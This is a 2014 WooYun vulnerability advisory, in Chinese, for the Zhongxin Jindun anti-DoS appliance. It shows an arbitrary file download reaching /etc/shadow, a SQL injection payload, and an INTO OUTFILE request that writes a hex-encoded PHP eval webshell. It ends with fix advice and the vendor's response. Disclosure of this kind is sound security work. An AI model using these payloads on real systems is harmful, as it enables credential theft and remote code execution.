当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053475

漏洞标题:中新金盾抗拒绝服务系统GetShell漏洞

相关厂商:安徽中新软件有限公司

漏洞作者: Tea

提交时间:2014-03-13 00:26

修复时间:2014-04-27 00:26

公开时间:2014-04-27 00:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-13: 细节已通知厂商并且等待厂商处理中
2014-03-19: 厂商已经确认,细节仅向厂商公开
2014-03-29: 细节向核心白帽子及相关领域专家公开
2014-04-08: 细节向普通白帽子公开
2014-04-18: 细节向实习白帽子公开
2014-04-27: 细节向公众公开

简要描述:

组合起来可GetWebshell

详细说明:

界面版本 2.3.4
系统参数 GFW-6200 Build #4913
需要登录,登录以后可以通过任意文件下载下载服务任意文件,包括/etc/shadow。
并且通过任意文件下载漏洞下载源码获得WEB路径。
再通过SQL注入漏洞写文件到WEB目录下拿Webshell

漏洞证明:

任意文件下载漏洞:
https://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/etc/passwd
https://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/etc/shadow

0.jpg


SQL注入漏洞(数量不少,其他文件用的addslashes()呢?咋不用了。):
攻击分析菜单里面的列表-->
查询主机,都存在注入,这里只列一个。
POC:
'and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

1.jpg


2.jpg


GetWebshell:
首先通过下载任意文件漏洞下载源码文件,获得Web路径:
/xxx/usx/XXXx/
再通过SQL注入导出文件到WEB目录:
https://1.1.1.1:28XX3/cgi-bin/index.php?t=analysis_attack&c=getAttDetailById&_=1119844506390&o=json&id=-54' Union select 0x3c3f706870206576616c28245f504f53545b277a275d293b3f3e,2,3,4 from mysql.user into outfile '/xxx/usx/XXXx/z.php'%23

4.jpg

修复方案:

注入点很多的,请全部仔细排查下。
那么多字符型的,你们用过的addslashes()咋不用了?
数字型的就强制转吧。
任意文件下载。
你得限制下载目录以及文件格式吧?

版权声明:转载请注明来源 Tea@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2014-03-19 09:19

厂商回复:

与http:///bugs/wooyun-2014-一并,已经由CNVD直接联系软件生产厂商,并直接联系到技术部门负责人,向其通报漏洞情况,由生产厂商后续处置。

最新状态:

暂无